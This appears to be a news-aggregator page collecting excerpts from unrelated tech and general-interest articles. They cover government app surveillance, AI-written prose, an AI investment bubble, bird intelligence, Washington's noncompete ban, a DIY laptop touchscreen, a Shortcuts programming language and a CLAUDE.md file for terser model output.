The GAO reported in 2023 that nearly 60% of 236 privacy and security recommendations issued since 2010 had still not been implemented. Congress has been told twice, in 2013 and 2019, to pass comprehensive internet privacy legislation. It has done neither. And it won’t, because the surveillance apparatus serves the people who run it, and the people who run it write the laws. Oversight is theater. The GAO issues a report, Congress holds a hearing, everyone performs concern for the cameras, and then the contracts get renewed and the data keeps flowing. It’s working exactly as designed.
The federal government publishes content available through standard web protocols and RSS feeds, then wraps that content in applications that demand access to your location, biometrics, storage, contacts, and device identity. They embed advertising trackers in FBI apps. They sell the line that you need their app to receive their propaganda while the app quietly collects data that flows into the same surveillance pipeline feeding ICE raids and warrantless location tracking. Every single one of these apps could be replaced by a web page, and they know that. The app exists because a web page can’t read your fingerprint, track your GPS in the background, or inventory the other accounts on your device.
You don’t need their app. You don’t need their permission to access public information. You already have a browser, an RSS reader, and the ability to decide for yourself what runs on your own hardware. Use them.
...
Read the original on www.sambent.com »
Don’t Let AI Write For You Go does not allow truthiness Simple Semaphore With a Buffered Channel in Go 🎙️, 🎙️ - Is this thing on? What happens when you go to this site? Everything Useful I Know About kubectl Choosing the right scope function in Kotlin What do data classes give you in Kotlin? How similar is the execution of Java and JavaScript?
Don’t Let AI Write For You When you write a document or essay, you are posing a question and then answering it. For example, a PRD answers the question, “What should we build?” A technical spec answers, “How should we build it?” Sometimes the question is more difficult to answer—“What are we even trying to accomplish?” And with every attempt at answering, you reflect on whether you’re asking the right question.
But now, of course, we have LLMs. I’m seeing an increasing amount of LLM-generated documents, articles, and essays. I want to caution against this. Each LLM-generated document is a missed opportunity to think and build trust.
The goal of writing is not to have written. It is to have increased your understanding, and then the understanding of those around you. When you are tasked to write something, your job is to go into the murkiness and come out of it with structure and understanding. To conquer the unknown.
The second order goal of writing is to become more capable. It is like working out. Every time you do a rep on the boundary of what you can do, you get stronger. It is uncomfortable and effortful.
Letting an LLM write for you is like paying somebody to work out for you.
There are social effects to LLM-generated writing too. When I send somebody a document that whiffs of LLM, I’m only demonstrating that the LLM produced something approximating what others want to hear. I’m not showing that I contended with the ideas.
It undermines my credibility as a person who could lead whatever initiative comes out of this document. That’s unfortunate. I could have used this opportunity to establish credibility.
LLM-generated writing undermines the authenticity of not just one’s writing but of the thinking behind it as well. If the prose is automatically generated, might the ideas be too?
How LLMs can be used in the writing process
LLMs are useful for research and checking your work. They can also work well for quickly recording information or transcribing text (neither of which are what I mean by “writing”, as in “writing an essay”).
They are particularly good at generating ideas. They thrive in this use case because if they generate 10 things and only one is useful, no harm is done. You can take what is useful and leave the rest behind.
These LLMs will increase efficiency in delivering software. But in order to make the most of them, we need a simultaneous rise in our level of thoughtfulness.
...
Read the original on alexhwoods.com »
The catalysts for a crash are already laid out, and it can happen sooner than most expect. AI is here to stay. If used right, chances are it will make us all more productive. That, on the other hand, does not mean it will be a good investment.
Magnificent 7 companies are increasing capex to their biggest ever to differentiate their tech from each other and the big AI labs, but the key realization is that they don’t have to spend it to win. It’s a defensive move for them, if they commit $50B, OpenAI and Anthropic need to go raise $100B each to stay competitive, which makes them reliant on investors’ money. As the numbers get bigger, the amount of funds that can write checks of the size required to fill such amounts gets smaller. And many of them are now getting bombed in the Gulf.
This is the reason there’s a push for IPOs, it’s because it’s the only option left to keep the funding coming.
Taking this into account, Google is extremely well positioned to weather the storm. When they announce capex expenditure, they don’t spend it overnight. They can simply deploy month by month until their competitors struggle to raise and get forced to capitulate. At that point they can just ramp down the spending and declare victory in a cornered market. They don’t need capex, they just need to make it very clear for everyone that nobody can outspend them. It is hard to picture as numbers get so big, but Alphabet (Google’s parent) is ten times more valuable than the biggest military company .
This also has a great implication for the Mag 7, especially Google: their capex will be a lot smaller in practice than projected, and as investors hate to see high capex in tech, the market will probably reward that if it materializes.
Apple didn’t even have to pretend, their strategy of waiting on the sidelines, while selling Mac Minis, for someone to come up with a good-enough model and just buy that when it’s done seems to be working. They may not even do that, they are now hinting at charging models for being available on Siri. Amazon is hedged with an Anthropic investment, and Meta is spending like there’s no tomorrow.
We’re hitting the worst-case scenarios for the big AI labs: energy, their biggest expense, is at multi-year highs, capital from the Gulf is not available for obvious reasons, there are serious concerns about a rate hike, and RAM prices are crashing because new models won’t need as much, but labs already bought them at sky-high prices. And that last innovation came from their biggest competitor, Google.
Anthropic is already in a push to reduce costs and increase revenue. If investor money dries up, they will be forced to cut their losses and pass the true costs to their users. The question is now if customers will be willing to pay up. Independent reports state that Claude metered models are priced 5x more expensive than their subscribers pay, and nobody is sure if even their metered pricing is profitable. In investing, stories are way more exciting than reality: a company losing money but growing like crazy is an easier sell than a huge company losing money or with tight margins. Raising prices will for sure decrease demand and that risks killing the growth story. And even if revenue keeps growing, it doesn’t matter if there are no margins — growing revenue without profits just means burning cash faster, especially when competing against companies that can offer the same product as a loss leader bundled into their cloud platforms.
It’s also worth mentioning that Claude’s most expensive subscription plans (Max and Max 5x, priced at $100 and $200 respectively) do not allow for yearly payments, hinting prices will go up.
OpenAI is struggling to monetize. They turned to showing ads in ChatGPT, something Sam Altman once called a “last resort”, while Anthropic is crushing them with the more profitable corporate customers and software engineers. Their shopping feature flopped and they shut down Sora, both supposed to be revenue drivers.
I wouldn’t be surprised at all if in the next couple of quarters we see OpenAI looking for an exit. It will be interesting because the sizes are now so big that we will probably know all the details. The most likely buyer is Microsoft, they already own a lot of it, and because of that, they are the most interested in showing a win. Sam Altman managed to get Microsoft so involved in OpenAI that making sure it lands on its feet is a Microsoft problem to solve. But, would shareholders vote to spend 22% of an established company’s market cap to rescue a money-burning AI lab that has lost most of its differentiators?
And independent of whether Microsoft makes money or not in their OpenAI endeavor, it kills the story: they were betting the whole growth story on AI, and if that doesn’t work out, then what’s left to justify a high stock price? They lose a big customer for their cloud services. Even worse considering that now, using the AI they helped fund, everyone can compete with their sub-par products. GitHub is a good candidate for disruption, and that’d be just the start.
You may think that you’re not affected by the big labs struggling. Hell, you may even be happy that they won’t be replacing your job after all. But that is far from reality.
Investments are now so big that writing them off would certainly hurt public companies’ balance sheets, and their growth prospects. This will drag the whole market, reducing valuations and slowing M&A, which further dries up VC money and slows down investments. Just like it happened in 2022.
And this has even more ramifications, pension funds around the world will take a hit. Datacenters that were built with the expectation of growth will now be undercapacity, because as training is the most compute-intensive part of a model, if there’s no capital to train a new one, they won’t be needed. GPUs then sit idle while their value goes down as there’s no demand. Some committed GPUs may never get delivered, or even manufactured. Investment drying up is a disaster for Nvidia, now the biggest company in the world.
It could happen that datacenters are not underused, but they get to charge their customers a way lower rate than they projected before building, so everyone benefits from AI but them.
Building a datacenter is supposed to be a “safe” investment in normal times, so banks give private credit and mortgages to finance them. A write-off of those assets means that banks start realizing losses, hurting their capacity to loan, and some may even be forced to liquidate, just like we saw in 2023. And all this assumes we don’t get disruptions in manufacturing in Taiwan or global supply chains.
Of course, the content of this article is highly speculative, it may end up being that demand for models is just so high it offsets every other problem I lay. But almost all innovations go through a boom and bust cycle and I don’t see a reason this is an exception.
Thanks to Javier Silveira and Augusto Gesualdi for reviewing drafts of this post.
...
Read the original on martinvol.pe »
← Writing
I was doomscrolling Reddit at 1am (as you do) and someone had posted a video from the New Zealand Transport Agency. Road workers near a tunnel by Milford Sound kept finding their traffic cones in weird places. Dragged into the road, rearranged, sometimes actively rerouting traffic. Nobody could figure out what was going on, so they checked the cameras.
Kea. Native to New Zealand, these big parrots are usually seen on the route to Milford Sound harassing tourists. A flock of them is officially called a “circus” or a “curiosity” — whoever named them clearly met one. The footage showed them just… casually shoving cones around a construction site. But here’s the insane bit — workers said the kea would listen for cars coming through the tunnel BEFORE moving the cones, timing it so the cars would have to stop. Why? Because stopped cars mean humans getting out. Humans getting out means food.
These birds are smarter than some adults I know. Move cone → car stops → human gets out → human feeds me. They independently invented toll booths.
The transport agency’s solution was equally funny. They switched to heavier cones the birds couldn’t move, and then — I’m not making this up — they built “kea gyms” by the roadside. Puzzle stations and contraptions to keep them entertained. A government agency literally built a playground for parrots because they were too smart for traffic management. Honestly, I’m fine with my tax dollars going to this.
Obviously now I had to know — is this the smartest bird in the world? And hold on, how do you actually measure how smart a bird is? So I whipped out ChatGPT and Google Scholar and here’s what I learned.
How do you give an IQ test to a bird?
Turns out there’s no single test — researchers have come up with a bunch of different experiments over the years, each designed to measure a different type of intelligence. Some of these I’d fail too tbh.
First up, the mirror test. You stick a coloured mark on a bird somewhere it can only see in a mirror. If it looks at the mirror and then tries to remove the mark from its own body, it recognises that the reflection is itself. That’s self-awareness. Most animals completely fail this — dogs fail it, cats fail it. Eurasian magpies pass it. One of the very few non-mammals to do so. Your local magpie has a stronger sense of self than your golden retriever. Pretty humbling for the dog.
Then there’s a cool one called Aesop’s Fable — my favourite. It’s literally named after the fable where a thirsty crow drops stones into a pitcher to raise the water level. Researchers put food floating in a narrow tube of water that the bird can’t reach. The question is whether it’ll figure out to drop objects in to raise the water level and get the food. Rooks, New Caledonian crows, and Eurasian jays all pass. Some of them even figure out that heavy objects sink (useful) while light objects float (useless). A fable from 600 BC and it turns out Aesop was just reporting the news.
Next, the delayed gratification test. The marshmallow test, but for birds. Offer an OK snack now, or a much better snack if they wait. Ravens pick the better future reward over 70% of the time. They’ll even choose a tool they’ll need later over an immediate food reward. That’s more self-control than I have around a bowl of chips.
There’s also vocal mimicry and communication, which goes way beyond “Polly wants a cracker.” Dr. Irene Pepperberg studied an African grey parrot named Alex for 30 years. Alex could identify objects, colours, shapes, and numbers. He understood abstract concepts like “same” and “different.” His vocabulary exceeded 100 words. When he died in 2007, his last words to Pepperberg were reportedly “You be good. I love you. See you tomorrow.” I don’t care how you define intelligence — that one’s hard to brush off.
And finally, spatial memory. Clark’s nutcrackers cache up to 33,000 seeds across thousands of locations each autumn — and remember where most of them are months later. I lose my keys in a two-bedroom apartment.
Here’s the wild part. A 2016 study in PNAS found that parrots and songbirds pack roughly twice as many neurons into their forebrains as primate brains of the same mass. The neurons are just much smaller and more densely packed. A crow’s brain weighs about 10 grams. A chimpanzee’s weighs about 400 grams. And yet corvids demonstrate cognitive abilities that rival great apes: tool use, planning, and social reasoning.
Orange = birds, grey = mammals. Dashed lines show trend. Birds sit far above the mammal curve.
A macaw’s brain weighs 20 grams and has roughly the same number of forebrain neurons as a macaque monkey’s brain at 70 grams. Ounce for ounce, bird brains are some of the most computationally dense organs in the animal kingdom. Calling someone a “bird brain” is honestly more of a compliment.
Enjoying this? Subscribe for occasional thoughts, delivered less than weekly.
Ok so who’s the smartest?
There’s no definitive answer because different species dominate different areas. But after going through all of this, if you made me rank them, I’d probably go:
Evil genius tier: Corvids (crows, ravens, magpies, jays). The tool users. New Caledonian crows are probably the standout — they craft hooks from sticks to pull grubs out of crevices, something we thought only primates could do. Ravens plan for the future. Magpies recognise themselves in mirrors. Jays hide food and then re-hide it if they think another bird was watching. That last one is wild — it means they can model what another bird knows. They’re paranoid in a way that requires theory of mind.
Con artist tier: Parrots (African greys, kea, cockatoos). The communicators and schemers. Alex the African grey is the poster child, but kea might be the most broadly impressive. A University of Auckland study found kea can judge statistical probabilities — something previously demonstrated only in human infants and great apes. In other tests at Canterbury University, kea outscored gibbons. Actual primates. Goffin’s cockatoos can unlock a sequence of five different locks in the right order to reach a reward. Each lock has a different mechanism. Worthwhile contenders for a spot in Ocean’s Fourteen if they ever make one.
Quietly competent tier: Songbirds. Clark’s nutcrackers, chickadees, and a handful of others. They won’t pick your locks or craft tools, but they’ll memorise 33,000 seed locations and find them nine months later under snow. The accountants of the bird world.
Honestly, corvids and parrots are neck and neck. Corvids edge ahead on tool use and physical problem solving. Parrots are ahead on communication and social cognition. Both would absolutely destroy your average pigeon in a pub quiz.
I also had to look up the dumbest bird. You might guess it’s a turkey — and they do have a reputation for being dim, mostly because domestic turkeys have been selectively bred to be so heavy they can’t fly and so docile they just stand around. Wild turkeys are actually pretty sharp. But no, the real answer is the kakapo — which is also a New Zealand parrot, funnily enough. The kakapo evolved with no natural predators, so when it encounters a threat it just… freezes. Stands completely still and hopes for the best. The males also have a mating call so confusing that the females often can’t figure out where the sound is coming from. Between that and the freezing thing, there are fewer than 200 left. The kea got all the brains in the New Zealand parrot family.
What I took away from this
We default to thinking intelligence scales with brain size, that it’s a mammal thing, that it correlates with being “higher” on some imaginary evolutionary ladder. Turns out it’s about neuron density and architecture, not mass. A 10 gram raven brain running 1.2 billion neurons is doing more per gram than almost anything else in nature.
Anyway. Next time someone calls you a bird brain, just say thank you.
Disclaimer: Thoughts are my own and do not represent any other parties.
Less than weekly. No noise — just the things I think are worth sharing.
You might also like
...
Read the original on dhanishsemar.com »
The measure, spearheaded by state Rep. Liz Berry (D-Seattle), outlaws noncompete agreements: in general, contracts that let employers forbid workers from creating or joining a competing business for a set amount of time.
Industries that utilize noncompete agreements, otherwise known as restrictive covenants, include technology, health care, finance and sales. The law, signed Monday, takes effect on June 30, 2027.
“Washington state is standing up for workers,” Berry said in a news release published Wednesday. “If you want to take a new job with better pay or leave to start your own company, your old job shouldn’t be able to block you from pursuing your dream.”
On the effective date, restrictive covenants will be unenforceable for all Washington-based workers and businesses, according to the new law. New noncompete agreements are illegal. Employers must notify current and former workers in writing about any voided noncompete agreements by Oct. 1, 2027.
The measure furthers a state law from 2019 that limited noncompete agreements to employees who earned more than about $126,859 and contractors who made more than around $317,147, according to the 2026 earnings thresholds posted by the Washington State Department of Labor and Industries.
The state’s latest approach echoes a decision made in 2024 under former President Joe Biden’s administration to prohibit noncompete agreements across the U. S. However, the Federal Trade Commission rolled back the ban this year.
“After the Non-Compete Rule was issued, several employers and trade groups filed lawsuits challenging it,” the agency wrote in a rule published in February. “Federal district courts in three jurisdictions issued opinions in lawsuits challenging the Non-Compete Rule.”
In Washington, the new injunction also clarifies nonsolicitation agreements, which bar former workers from courting clients and co-workers at their past workplaces.
Nonsolicitation agreements are not the same as noncompete agreements, and they are not prohibited. “However, the definition of (the) nonsolicitation agreement must be narrowly construed,” per the law.
Locally, attorneys are providing guidance to workplaces about the new measure.
“Washington now joins a small but growing number of states that have declared non-competition covenants void and unenforceable,” Alex Cates, senior counsel at law firm Holland and Knight, wrote in an advisory Tuesday. “This is a major change.”
States with full noncompete bans include California, North Dakota, Minnesota and Oklahoma, per the Economic Innovation Group, a bipartisan public policy organization.
...
Read the original on www.seattletimes.com »
We turned a MacBook into a touchscreen using only $1 of hardware and a little bit of computer vision. The proof-of-concept, dubbed “Project Sistine” after our recreation of the famous painting in the Sistine Chapel, was prototyped by me, Kevin, Guillermo, and Logan in about 16 hours.
The basic principle behind Sistine is simple. Surfaces viewed from an angle tend to look shiny, and you can tell if a finger is touching the surface by checking if it’s touching its own reflection.
Kevin, back in middle school, noticed this phenomenon and built ShinyTouch, utilizing an external webcam to build a touch input system requiring virtually no setup. We wanted to see if we could miniaturize the idea and make it work without an external webcam. Our idea was to retrofit a small mirror in front of a MacBook’s built-in webcam, so that the webcam would be looking down at the computer screen at a sharp angle. The camera would be able to see fingers hovering over or touching the screen, and we’d be able to translate the video feed into touch events using computer vision.
Our hardware setup was simple. All we needed was to position a mirror at the appropriate angle in front of the webcam. Here is our bill of materials:
After some iteration, we settled on a design that could be assembled in minutes using a knife and a hot glue gun.
The first step in processing video frames is detecting the finger. Here’s a typical example of what the webcam sees:
The finger detection algorithm needs to find the touch/hover point for further processing. Our current approach uses classical computer vision techniques. The processing pipeline consists of the following steps:
Find the two largest contours and ensure that the contours overlap in the
horizontal direction and the smaller one is above the larger one
Identify the touch/hover point as the midpoint of the line connecting the
top of the bottom contour and the bottom of the top contour
Distinguish between touch and hover based on the vertical distance between
the two contours
Shown above is the result of applying this process to a frame from the webcam. The finger and reflection (contours) are outlined in green, the bounding box is shown in red, and the touch point is shown in magenta.
The final step in processing the input is mapping the touch/hover point from webcam coordinates to on-screen coordinates. The two are related by a
homography. We compute the homography matrix through a calibration process where the user is prompted to touch specific points on the screen. After we collect data matching webcam coordinates with on-screen coordinates, we can estimate the homography robustly using RANSAC. This gives us a projection matrix that maps webcam coordinates to on-screen coordinates.
The video above demonstrates the calibration process, where the user has to follow a green dot around the screen. The video includes some debug information, overlaid on live video from the webcam. The touch point in webcam coordinates is shown in magenta. After the calibration process is complete, the projection matrix is visualized with red lines, and the software switches to a mode where the estimated touch point is shown as a blue dot.
In the current prototype, we translate hover and touch into mouse events, making existing applications instantly touch-enabled.
If we were writing our own touch-enabled apps, we could directly make use of touch data, including information such as hover height.
Project Sistine is a proof-of-concept that turns a laptop into a touchscreen using only $1 of hardware, and for a prototype, it works pretty well! With some simple modifications such as a higher resolution webcam (ours was 480p) and a curved mirror that allows the webcam to capture the entire screen, Sistine could become a practical low-cost touchscreen system.
Our Sistine prototype is open source, released under the MIT License.
...
Read the original on anishathalye.com »
Cherri (pronounced cherry) is a Shortcuts programming language that compiles directly to a valid runnable Shortcut.
The primary goal is to make it practical to create large Shortcut projects (within the limitations of Shortcuts) and maintain them long term.
* 🎓 Easy to learn and syntax similar to other languages
* 🐞 1-1 translation to Shortcut actions as much as possible to make debugging easier
* 🥾 Half-bootstrapped: Most actions and types are written in the language
* 📦 Package manager: Remote Git repo-based package manager built in, allowing for automatic inclusion and updates.
* 🪶 Optimized to create as small as possible Shortcuts and reduce memory usage at runtime
* #️⃣ Include files within others for large Shortcut projects
* 🔄 Define functions to run within their own scope at the top of your Shortcut to reduce duplicate actions.
* 🔀 Convert Shortcuts from an iCloud link with the –import= option
* 🔏 Signs using macOS, falls back on HubSign or another server that uses scaxyz/shortcut-signing-server.
You can install Cherri by downloading the latest release or via the Homebrew or Nix package managers:
If you have Homebrew installed, you can run:
brew tap electrikmilk/cherri
brew install electrikmilk/cherri/cherri
If you have Nix installed, you can run:
nix profile install github:electrikmilk/cherri
Alternatively, you can use nix-direnv to get an isolated, effortless dev environment where cherri is available based on which directory you’re in. Then you would use_flake and add Cherri to flake.nix:
inputs.cherri.url = “github:electrikmilk/cherri”;
{ # outputs.packages.${system}.default = pkgs.mkShell etc - omitted for brevity
buildInputs = [
inputs.cherri.packages.${system}.cherri
Then run direnv allow in the directory with the flake.nix file.
cherri file.cherri
Run cherri without any arguments to see all options and usage. For development, use the –debug (or -d) option to print stack traces, debug information, and output a .plist file.
Some languages have been abandoned, don’t work well, or no longer work. I don’t want Shortcuts languages to die. There should be more, not less.
Plus, some stability comes with this project being on macOS and not iOS, and I’m not aware of another Shortcuts language with macOS as its platform other than Buttermilk.
The original Workflow app assigned a code name to each release. Cherri is named after the second-to-last update “Cherries” (also cherry is one of my favorite flavors).
...
Read the original on github.com »
One file. Drop it in your project. Cuts Claude output verbosity by ~63%. No code changes required. Note: most Claude costs come from input tokens, not output. This file targets output behavior - sycophancy, verbosity, formatting noise. It won’t fix your biggest bill but it will fix your most annoying responses. Model support: benchmarks were run on Claude only. The rules are model-agnostic and should work on any model that reads context - but results on local models like llama.cpp, Mistral, or others are untested. Community results welcome.
When you use Claude Code, every word Claude generates costs tokens. Most people never control how Claude responds - they just get whatever the model decides to output.
* Opens every response with “Sure!”, “Great question!”, “Absolutely!”
* Ends with “I hope this helps! Let me know if you need anything!”
* Restates your question before answering it
* Adds unsolicited suggestions beyond what you asked
* Over-engineers code with abstractions you never requested
All of this wastes tokens. None of it adds value.
Drop CLAUDE.md into your project root. Claude Code reads it automatically. Behavior changes immediately.
This file works best for:
* Repeated structured tasks where Claude’s default verbosity compounds across hundreds of calls
* Teams who need consistent, parseable output format across sessions
This file is not worth it for:
* Single short queries - the file loads into context on every message, so on low-output exchanges it is a net token increase
* Casual one-off use - the overhead doesn’t pay off at low volume
* Fixing deep failure modes like hallucinated implementations or architectural drift - those require hooks, gates, and mechanical enforcement
* Pipelines using multiple fresh sessions per task - fresh sessions don’t carry the CLAUDE.md overhead benefit the same way persistent sessions do
* Parser reliability at scale - if you need guaranteed parseable output, use structured outputs (JSON mode, tool use with schemas) built into the API - that is a more robust solution than prompt-based formatting rules
* Exploratory or architectural work where debate, pushback, and alternatives are the point - the override rule lets you ask for that any time, but if that’s your primary workflow this file will feel restrictive
The honest trade-off:
The CLAUDE.md file itself consumes input tokens on every message. The savings come from reduced output tokens. The net is only positive when output volume is high enough to offset the persistent input cost. At low usage it costs more than it saves.
Same 5 prompts. Run without CLAUDE.md (baseline) then with CLAUDE.md (optimized).
~384 output tokens saved per 4 prompts. Same information. Zero signal loss.
Methodology note: This is a 5-prompt directional indicator, not a statistically controlled study. Claude’s output length varies naturally between identical prompts. No variance controls or repeated runs were applied. Treat the 63% as a directional signal for output-heavy use cases, not a precise universal measurement. The CLAUDE.md file itself adds input tokens on every message - net savings only apply when output volume is high enough to offset that persistent cost.
Scope rules to your actual failure modes, not generic ones.
Generic rules like “be concise” help but the real wins come from targeting specific failures you’ve actually hit. For example if Claude silently swallows errors in your pipeline, add a rule like: “when a step fails, stop immediately and report the full error with traceback before attempting any fix.” Specific beats generic every time.
CLAUDE.md files compose - use that.
Claude reads multiple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), project-level, and subdirectory-level. This means:
* Keep general preferences (tone, format, ASCII rules) in your global file
* Keep project-specific constraints (“never modify /config without confirmation”) at the project level
This avoids bloating any single file and keeps rules close to where they apply.
Different project types need different levels of compression. Pick the base file + a profile, or use the base alone.
curl -o CLAUDE.md https://raw.githubusercontent.com/drona23/claude-token-efficient/main/CLAUDE.md
git clone https://github.com/drona23/claude-token-efficient
cp claude-token-efficient/profiles/CLAUDE.coding.md your-project/CLAUDE.md
Option 3 - Manual:
Copy the contents of CLAUDE.md from this repo into your project root.
User instructions always win. If you explicitly ask for a detailed explanation or verbose output, Claude will follow your instruction - the file never fights you.
Found a behavior that CLAUDE.md can fix? Open an issue with:
The annoying behavior (what Claude does by default)
The prompt that triggers it
Community submissions become part of the next version with full credit.
This project was built on real complaints from the Claude community. Full credit to every source that contributed a fix:
MIT - free to use, modify, and distribute.
Built by Drona Gangarapu - open to PRs, issues, and profile contributions.
...
Read the original on github.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.